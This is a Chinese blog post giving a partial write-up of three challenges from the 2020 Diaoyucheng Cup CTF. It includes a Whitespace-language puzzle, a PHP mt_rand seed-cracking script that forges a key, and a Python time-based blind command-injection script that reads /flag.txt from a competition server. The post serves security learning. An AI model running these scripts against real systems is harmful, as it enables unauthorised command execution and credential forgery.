<!DOCTYPE html><html lang="en"><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" name="viewport"><meta content="yes" name="apple-mobile-web-app-capable"><meta content="black-translucent" name="apple-mobile-web-app-status-bar-style"><meta content="telephone=no" name="format-detection"><meta name="description" content=""><title>首届钓鱼城杯部分wp | xiaoZ's Blog</title><link rel="stylesheet" type="text/css" href="/css/style.css?v=0.0.0"><link rel="stylesheet" type="text/css" href="//lib.baomitu.com/normalize/8.0.1/normalize.min.css"><link rel="stylesheet" type="text/css" href="//lib.baomitu.com/pure/1.0.0/pure-min.css"><link rel="stylesheet" type="text/css" href="//lib.baomitu.com/pure/1.0.0/grids-responsive-min.css"><link rel="stylesheet" href="//lib.baomitu.com/font-awesome/4.7.0/css/font-awesome.min.css"><script type="text/javascript" src="//lib.baomitu.com/jquery/3.4.0/jquery.min.js"></script><link rel="icon" mask="" sizes="any" href="/favicon.ico"><link rel="Shortcut Icon" type="image/x-icon" href="/favicon.ico"><link rel="apple-touch-icon" href="/apple-touch-icon.png"><link rel="apple-touch-icon-precomposed" href="/apple-touch-icon.png"><link rel="alternate" type="application/atom+xml" href="/atom.xml"><meta name="generator" content="Hexo 4.1.1"></head><body><div class="body_container"><div id="header"><div class="site-name"><h1 class="hidden">首届钓鱼城杯部分wp</h1><a id="logo" href="/.">xiaoZ's Blog</a><p class="description">Try My Best</p></div><div id="nav-menu"><a class="current" href="/."><i class="fa fa-home"> Home</i></a><a href="/archives/"><i class="fa fa-archive"> Archive</i></a><a href="/about/"><i class="fa fa-user"> About</i></a><a href="/atom.xml"><i class="fa fa-rss"> RSS</i></a></div></div><div class="pure-g" id="layout"><div class="pure-u-1 pure-u-md-3-4"><div class="content_container"><div class="post"><h1 class="post-title">首届钓鱼城杯部分wp</h1><div class="post-meta">Aug 28, 2020<span> | </span><span class="category"><a href="/categories/CTF-writeup/">CTF_writeup</a></span></div><a class="disqus-comment-count" data-disqus-identifier="2020/08/28/首届钓鱼城杯部分wp/" href="/2020/08/28/%E9%A6%96%E5%B1%8A%E9%92%93%E9%B1%BC%E5%9F%8E%E6%9D%AF%E9%83%A8%E5%88%86wp/#disqus_thread"></a><div class="clear"><div class="toc-article" id="toc"><div class="toc-title">Contents</div><ol class="toc"><li class="toc-item toc-level-3"><a class="toc-link" href="#Misc-whitespace"><span class="toc-number">1.</span> <span class="toc-text">Misc-whitespace</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Web-easyseed"><span class="toc-number">2.</span> <span class="toc-text">Web-easyseed</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#web-easyweb"><span class="toc-number">3.</span> <span class="toc-text">web-easyweb</span></a></li></ol></div></div><div class="post-content"><p>这比赛打的想剁手,seed那题一直在猜怎么提交，最开始猜到了因为xff拼错了耽误了好久23333，以至于最后zblog没时间解了</p>
<h3 id="Misc-whitespace">Misc-whitespace</h3>
<p>题目给了一个文件，打开来是空白的，用<code>sublime</code>打开，全选发现是一些空格和换行符,盲猜是<code>whitespace编程</code>…（安恒六月赛时有过一个，但是当时那个是snow一把梭就好了）。</p>
<p><img src="/image/202008_DYCB/whitespace.png" alt=""></p>
<p>结果找工具找了半天（上次用的工具被删了2333），最后找到编译器直接跑一下就出来了（错失一血…）</p>
<p><img src="/image/202008_DYCB/whitespace1.png" alt=""></p>
<h3 id="Web-easyseed">Web-easyseed</h3>
<p>题目提示是一个开锁的游戏，并且说不是主人，于是需要找到<code>key</code>和<code>lock</code>，在<code>cookie</code>中可以找到，并且有提示需要从lock中推出key</p>
<p><img src="/image/202008_DYCB/seed1.png" alt=""></p>
<p>看不出来咋推，先扫目录，发现有一个<code>index.bak</code>文件，打开可以拿到<code>key</code>和<code>lock</code>的生成代码</p>
<p><img src="/image/202008_DYCB/seed2.png" alt=""></p>
<p>看到是随机生成的，并且使用了<code>mt_rand</code>，题目又叫做<code>easyseed</code>，于是想到php伪随机爆破，使用<code>php_mt_seed</code>就可以，先把给的lock转化为可以识别的字符：</p>
<figure class="highlight vim"><table><tr><td class="code"><pre><span class="line">str1=<span class="string">'abcdefghigklmnopqrstuvwxyzABCDEFGHIGKLMNOPQRSTUVWXYZ'</span></span><br><span class="line">str2=<span class="string">'vEUHaY'</span></span><br><span class="line">length = <span class="built_in">len</span>(str2)    # <span class="number">10</span></span><br><span class="line"><span class="keyword">res</span>=<span class="string">''</span></span><br><span class="line"><span class="keyword">for</span> i in <span class="built_in">range</span>(<span class="built_in">len</span>(str2)):</span><br><span class="line">    <span class="keyword">for</span> <span class="keyword">j</span> in <span class="built_in">range</span>(<span class="built_in">len</span>(str1)):</span><br><span class="line">        <span class="keyword">if</span> str2[i] == str1[<span class="keyword">j</span>]:</span><br><span class="line">            <span class="keyword">res</span>+=str(<span class="keyword">j</span>)+<span class="string">' '</span>+str(<span class="keyword">j</span>)+<span class="string">' '</span>+<span class="string">'0'</span>+<span class="string">' '</span>+str(<span class="built_in">len</span>(str1)-<span class="number">1</span>)+<span class="string">' '</span></span><br><span class="line">            <span class="keyword">break</span></span><br><span class="line"><span class="keyword">print</span>(<span class="keyword">res</span>)</span><br></pre></td></tr></table></figure>
<p>拿到后放到<code>php_mt_seed</code>中直接跑出随机种子来</p>
<p><img src="/image/202008_DYCB/seed3.png" alt=""></p>
<p>然后用题目的生成逻辑重新生成一下<code>key</code>就行了，这里爆破出两个种子，用第一个就可以了</p>
<figure class="highlight xml"><table><tr><td class="code"><pre><span class="line"><span class="php"><span class="meta">&lt;?php</span></span></span><br><span class="line"></span><br><span class="line"><span class="php">mt_srand(<span class="number">718225</span>);</span></span><br><span class="line"><span class="php"><span class="comment">// nRtqGR8mtd9ZOPyI</span></span></span><br><span class="line"></span><br><span class="line"><span class="php"><span class="function"><span class="keyword">function</span> <span class="title">random</span><span class="params">($length, $chars = <span class="string">'0123456789ABC'</span>)</span> </span>&#123;</span></span><br><span class="line"><span class="php">	</span></span><br><span class="line"><span class="php">    $hash = <span class="string">''</span>;</span></span><br><span class="line"><span class="php">    $max = strlen($chars) - <span class="number">1</span>;</span></span><br><span class="line"><span class="php">    <span class="keyword">for</span>($i = <span class="number">0</span>; $i &lt; $length; $i++) &#123;</span></span><br><span class="line"><span class="php">        $hash .= $chars[mt_rand(<span class="number">0</span>, $max)];</span></span><br><span class="line"><span class="php">    &#125;</span></span><br><span class="line"><span class="php">    <span class="keyword">return</span> $hash;</span></span><br><span class="line"><span class="php">&#125;</span></span><br><span class="line"><span class="php">$lock = random(<span class="number">6</span>, <span class="string">'abcdefghigklmnopqrstuvwxyzABCDEFGHIGKLMNOPQRSTUVWXYZ'</span>);</span></span><br><span class="line"><span class="php">$key = random(<span class="number">16</span>, <span class="string">'1294567890abcdefghigklmnopqrstuvwxyzABCDEFGHIGKLMNOPQRSTUVWXYZ'</span>);</span></span><br><span class="line"><span class="php"><span class="keyword">echo</span> $lock;</span></span><br><span class="line"><span class="php"><span class="keyword">echo</span> <span class="string">"\n"</span>;</span></span><br><span class="line"><span class="php"><span class="keyword">echo</span> $key;</span></span><br><span class="line"><span class="php"><span class="meta">?&gt;</span></span></span><br></pre></td></tr></table></figure>
<p>拿到<code>key</code>值之后就是坑了，一直提交都失败，后面想到是不是需要加<code>xff</code>头，结果因为自己拼错了…耽误了好久…后面回头一看才发现，这里直接把生成的钥匙放到<code>cookie</code>里，然后加上<code>xff</code>头就可以拿到flag了。</p>
<p><img src="/image/202008_DYCB/seed4.png" alt=""></p>
<h3 id="web-easyweb">web-easyweb</h3>
<p>最开始有点懵，什么都没给，最后再<code>response</code>里面发现了一个提示<code>Post: cmd</code></p>
<p><img src="/image/202008_DYCB/web1.jpg" alt=""></p>
<p>于是猜测是否为一句话，但是直接用蚁剑或菜刀连都失败了，想到是否是无回显的，于是尝试使用<code>sleep</code>，发现有明显延迟，那就应该是<code>bash时间盲注</code>了，直接写脚本跑就行。</p>
<figure class="highlight routeros"><table><tr><td class="code"><pre><span class="line"><span class="comment">#encoding:utf-8</span></span><br><span class="line">import requests,time</span><br><span class="line"></span><br><span class="line"><span class="attribute">url</span>=<span class="string">'http://119.3.37.185'</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">'__main__'</span>:</span><br><span class="line">	<span class="attribute">pos</span>=1</span><br><span class="line">	<span class="attribute">flag</span>=<span class="string">''</span></span><br><span class="line">	<span class="attribute">ses</span>=requests.session()</span><br><span class="line">	<span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">		<span class="keyword">for</span> i <span class="keyword">in</span> range(32,127):</span><br><span class="line">			<span class="attribute">t1</span>=time.time()</span><br><span class="line">			try:</span><br><span class="line">				</span><br><span class="line">				<span class="attribute">r</span>=ses.post(url=url,data=&#123;<span class="string">'cmd'</span>:<span class="string">'if [ $(tail -n 1 /flag.txt|cut -c %s) = %s ]; then sleep 4; fi'</span>%(str(pos),chr(i))&#125;,</span><br><span class="line">					<span class="attribute">timeout</span>=7)</span><br><span class="line">			except Exception as e:</span><br><span class="line">				<span class="builtin-name">print</span>(e)</span><br><span class="line">			<span class="attribute">t2</span>=time.time()</span><br><span class="line">			<span class="keyword">if</span> t2-t1&gt;=3.5:</span><br><span class="line">				pos+=1</span><br><span class="line">				flag+=chr(i)</span><br><span class="line">				<span class="builtin-name">print</span>(flag)</span><br></pre></td></tr></table></figure>
<p>这里需要猜一下<code>flag</code>路径，最开始猜测是<code>/flag</code>，结果不对，后面想利用盲注列目录，写脚本的时候想到<code>/flag.txt</code>，结果还真是…于是flag就出来了…</p>
<p><img src="/image/202008_DYCB/web2.png" alt=""></p>
</div><div class="tags"><a href="/tags/CTF/">CTF</a><a href="/tags/writeup/">writeup</a></div><div class="post-nav"><a class="next" href="/2020/05/26/HTTP-Smuggling-%E8%AF%B7%E6%B1%82%E8%B5%B0%E7%A7%81/">HTTP_Smuggling-请求走私</a></div><div id="disqus_thread"><div class="btn_click_load"><button class="disqus_click_btn">阅读评论（请确保 Disqus 可以正常加载）</button></div><script type="text/javascript">var disqus_config = function () {
    this.page.url = 'http://www.xiaozzz.xyz/2020/08/28/首届钓鱼城杯部分wp/';
    this.page.identifier = '2020/08/28/首届钓鱼城杯部分wp/';
    this.page.title = '首届钓鱼城杯部分wp';
  };</script><script type="text/javascript" id="disqus-lazy-load-script">$.ajax({
url: 'https://disqus.com/next/config.json',
timeout: 2500,
type: 'GET',
success: function(){
  var d = document;
  var s = d.createElement('script');
  s.src = '//xiaoZz.disqus.com/embed.js';
  s.setAttribute('data-timestamp', + new Date());
  (d.head || d.body).appendChild(s);
  $('.disqus_click_btn').css('display', 'none');
},
error: function() {
  $('.disqus_click_btn').css('display', 'block');
}
});</script><script type="text/javascript" id="disqus-click-load">$('.btn_click_load').click(() => {  //click to load comments
    (() => { // DON'T EDIT BELOW THIS LINE
        var d = document;
        var s = d.createElement('script');
        s.src = '//xiaoZz.disqus.com/embed.js';
        s.setAttribute('data-timestamp', + new Date());
        (d.head || d.body).appendChild(s);
    })();
    $('.disqus_click_btn').css('display','none');
});</script><script type="text/javascript" id="disqus-count-script">$(function() {
     var xhr = new XMLHttpRequest();
     xhr.open('GET', '//disqus.com/next/config.json', true);
     xhr.timeout = 2500;
     xhr.onreadystatechange = function () {
       if (xhr.readyState === 4 && xhr.status === 200) {
         $('.post-meta .post-comments-count').show();
         var s = document.createElement('script');
         s.id = 'dsq-count-scr';
         s.src = 'https://xiaoZz.disqus.com/count.js';
         s.async = true;
         (document.head || document.body).appendChild(s);
       }
     };
     xhr.ontimeout = function () { xhr.abort(); };
     xhr.send(null);
   });
</script></div></div></div></div><div class="pure-u-1-4 hidden_mid_and_down"><div id="sidebar"><div class="widget"><div class="widget-title"><i class="fa fa-folder-o"> Categories</i></div><ul class="category-list"><li class="category-list-item"><a class="category-list-link" href="/categories/CTF-writeup/">CTF_writeup</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/Web%E6%BC%8F%E6%B4%9E%E4%BB%8B%E7%BB%8D/">Web漏洞介绍</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E5%AF%86%E7%A0%81%E5%AD%A6/">密码学</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E7%BC%96%E7%A0%81%E4%B8%8E%E5%BC%80%E5%8F%91/">编码与开发</a></li></ul></div><div class="widget"><div class="widget-title"><i class="fa fa-star-o"> Tags</i></div><div class="tagcloud"><a href="/tags/Web%E6%BC%8F%E6%B4%9E/" style="font-size: 15px;">Web漏洞</a> <a href="/tags/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/" style="font-size: 15px;">反序列化</a> <a href="/tags/CTF/" style="font-size: 15px;">CTF</a> <a href="/tags/%E5%AF%86%E7%A0%81%E5%AD%A6/" style="font-size: 15px;">密码学</a> <a href="/tags/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E7%90%86%E8%AE%BA/" style="font-size: 15px;">网络安全理论</a> <a href="/tags/%E5%93%88%E5%B8%8C%E5%87%BD%E6%95%B0/" style="font-size: 15px;">哈希函数</a> <a href="/tags/SSRF/" style="font-size: 15px;">SSRF</a> <a href="/tags/writeup/" style="font-size: 15px;">writeup</a> <a href="/tags/%E5%AD%97%E7%AC%A6%E4%B8%B2%E6%93%8D%E4%BD%9C/" style="font-size: 15px;">字符串操作</a> <a href="/tags/%E5%BC%80%E5%8F%91/" style="font-size: 15px;">开发</a> <a href="/tags/Web/" style="font-size: 15px;">Web</a></div></div><div class="widget"><div class="widget-title"><i class="fa fa-file-o"> Recent</i></div><ul class="post-list"><li class="post-list-item"><a class="post-list-link" href="/2020/08/28/%E9%A6%96%E5%B1%8A%E9%92%93%E9%B1%BC%E5%9F%8E%E6%9D%AF%E9%83%A8%E5%88%86wp/">首届钓鱼城杯部分wp</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/05/26/HTTP-Smuggling-%E8%AF%B7%E6%B1%82%E8%B5%B0%E7%A7%81/">HTTP_Smuggling-请求走私</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/05/22/Defcon-CTF-Qual-2020-Web-WP/">Defcon_CTF_Qual_2020-Web-WP</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/05/13/%E7%BD%91%E9%BC%8E%E6%9D%AF2020-%E9%9D%92%E9%BE%99%E7%BB%84-%E9%83%A8%E5%88%86WP/">网鼎杯2020-青龙组-部分WP</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/12/22/%E5%AF%86%E7%A0%81%E5%AD%A6%E5%AD%A6%E4%B9%A0-%E5%AF%86%E7%A0%81%E7%A1%AC%E4%BB%B6%E5%AE%89%E5%85%A8/">密码学学习-密码硬件安全</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/12/17/%E6%AD%A3%E5%88%99%E8%A1%A8%E8%BE%BE%E5%BC%8F%E5%9F%BA%E7%A1%80/">正则表达式基础</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/10/25/%E5%AF%86%E7%A0%81%E5%AD%A6%E5%AD%A6%E4%B9%A0-%E5%88%86%E7%BB%84%E5%AF%86%E7%A0%81/">密码学学习-分组密码</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/10/20/%E5%AF%86%E7%A0%81%E5%AD%A6%E5%AD%A6%E4%B9%A0-MAC%E4%B8%8EAEAD/">密码学学习-MAC与AEAD</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/10/16/%E5%AF%86%E7%A0%81%E5%AD%A6%E5%AD%A6%E4%B9%A0-%E6%95%B0%E5%AD%97%E8%AF%81%E4%B9%A6%E4%B8%8EPKI/">密码学学习-数字证书与PKI</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/10/12/%E5%AF%86%E7%A0%81%E5%AD%A6%E5%AD%A6%E4%B9%A0-%E5%AF%86%E7%A0%81%E6%9D%82%E5%87%91%E5%87%BD%E6%95%B0/">密码学学习-密码杂凑函数</a></li></ul></div><div class="widget"><div class="widget-title"><i class="fa fa-comment-o"> Recent Comments</i></div><script type="text/javascript" src="//xiaoZz.disqus.com/recent_comments_widget.js?num_items=5&amp;hide_avatars=1&amp;avatar_size=32&amp;excerpt_length=20&amp;hide_mods=1"></script></div><div class="widget"><div class="widget-title"><i class="fa fa-external-link"> Links</i></div><ul></ul><a href="https://momomoxiaoxi.com/" title="moxiaoxi" target="_blank">moxiaoxi</a></div></div></div><div class="pure-u-1 pure-u-md-3-4"><div id="footer">Copyright © 2020 <a href="/." rel="nofollow">xiaoZ's Blog.</a> Powered by<a rel="nofollow" target="_blank" href="https://hexo.io"> Hexo.</a><a rel="nofollow" target="_blank" href="https://github.com/tufu9441/maupassant-hexo"> Theme</a> by<a rel="nofollow" target="_blank" href="https://github.com/pagecho"> Cho.</a></div></div></div><a class="show" id="rocket" href="#top"></a><script type="text/javascript" src="/js/totop.js?v=0.0.0" async></script><script type="text/javascript" src="//lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js" async></script><script type="text/javascript" src="/js/fancybox.js?v=0.0.0" async></script><link rel="stylesheet" type="text/css" href="//lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css"><script type="text/javascript" color="100,100,100" opacity="0.5" zIndex="-2" count="50" src="//cdn.bootcss.com/canvas-nest.js/1.0.1/canvas-nest.min.js"></script><script type="text/javascript" src="/js/codeblock-resizer.js?v=0.0.0"></script><script type="text/javascript" src="/js/smartresize.js?v=0.0.0"></script></div><script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"model":{"jsonPath":"/live2dw/assets/hijiki.model.json"},"display":{"position":"right","width":150,"height":300},"mobile":{"show":true},"log":false,"pluginJsPath":"lib/","pluginModelPath":"assets/","pluginRootPath":"live2dw/","tagMode":false});</script></body></html>